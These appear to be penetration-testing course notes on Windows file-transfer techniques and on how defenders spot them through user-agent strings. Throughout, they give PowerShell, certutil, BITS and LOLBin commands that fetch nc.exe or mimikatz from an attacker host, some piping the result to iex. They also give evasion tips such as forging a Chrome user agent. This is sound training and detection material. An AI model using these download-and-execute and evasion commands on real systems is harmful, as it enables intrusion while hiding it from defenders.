Detection And Evasion

Detection Overview

Detection relies on identifying malicious actions through command-line patterns and user agent strings. While blacklisting commands is easy to bypass, whitelisting is more robust but requires initial setup to allow only legitimate commands.

User Agent String Analysis

User agents identify HTTP clients (e.g., browsers, tools like curl, sqlmap, or scripts). Organizations can build a list of known legitimate user agents (e.g., for browsers, system updates, antivirus) and use SIEM tools to detect anomalies and investigate suspicious agents.

Legitimate Traffic: Filter common user agents like Firefox, Chrome, Windows Update, etc.
Suspicious Activity: Investigate unknown or rare user agents for potential malicious actions.

HTTP Transfer Techniques

PowerShell (Invoke-WebRequest, Invoke-RestMethod):

Client Command:

Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

Server User-Agent:

Mozilla/5.0 WindowsPowerShell/5.1.14393.0

WinHttpRequest:

Client Command:

$h=new-object -com WinHttp.WinHttpRequest.5.1;
$h.open('GET','http://10.10.10.32/nc.exe',$false);
$h.send(); iex $h.ResponseText

Server User-Agent:

Mozilla/4.0 (compatible; WinHttp.WinHttpRequest.5)

Msxml2:

Client Command:

$h=New-Object -ComObject Msxml2.XMLHTTP;
$h.open('GET','http://10.10.10.32/nc.exe',$false);
$h.send(); iex $h.responseText

Server User-Agent:

Mozilla/4.0 (compatible; MSIE 7.0; Trident/7.0; .NET4.0C)

Certutil:

Client Command:

certutil -urlcache -split -f http://10.10.10.32/nc.exe

Server User-Agent:
```
Microsoft-CryptoAPI/10.0
```

BITS (Background Intelligent Transfer Service):

Client Command:

Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t; $r=gc $env:temp\t; rm $env:temp\t; iex $r

Server User-Agent:
```
Microsoft BITS/7.8
```

What are LOLBins and GTFOBins?

LOLBins (Living Off the Land Binaries):
Legitimate, pre-installed system binaries on Windows that attackers or penetration testers can repurpose to perform unintended tasks (like downloading files, executing commands, or escalating privileges).
GTFOBins:
The Linux equivalent of LOLBins, these are standard binaries often included in Linux distributions that can be exploited for similar purposes.

In short, LOLBins and GTFOBins let you leverage the target system’s trusted tools to achieve your goals (like file transfers) without introducing foreign artifacts or triggering security alerts.

Detection and Prevention

Whitelist or Blacklist Binaries:
- Whitelist allowed binaries and block known malicious ones.
Monitor User Agent Strings:
- Anomalous strings like Microsoft BITS/7.8 or WinHttp.WinHttpRequest.5 can indicate malicious activity.
Use SIEM for Analysis:
- Feed legitimate user agents into a SIEM and flag unknown ones for threat hunting.

Evading Detection: Key Concepts

Changing User Agents

Administrators may blacklist default PowerShell user agents, but Invoke-WebRequest allows customization using the -UserAgent parameter.
You can mimic popular browsers like Chrome or Firefox to make requests appear legitimate.

Example: Using a Chrome User Agent

Set the user agent to Chrome:

$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome

Perform the download:

Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

Netcat session output shows the forged user agent.

Using LOLBins for File Transfers

Application whitelisting may block tools like PowerShell or Netcat.
Living Off the Land Binaries (LOLBins) can be used to bypass restrictions.

Example: Intel GfxDownloadWrapper.exe

Some systems have Intel's GfxDownloadWrapper.exe, which can download files:

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Additional Resources

LOLBAS: Find Windows binaries that can perform file downloads.
GTFOBins: Locate Linux binaries with similar capabilities.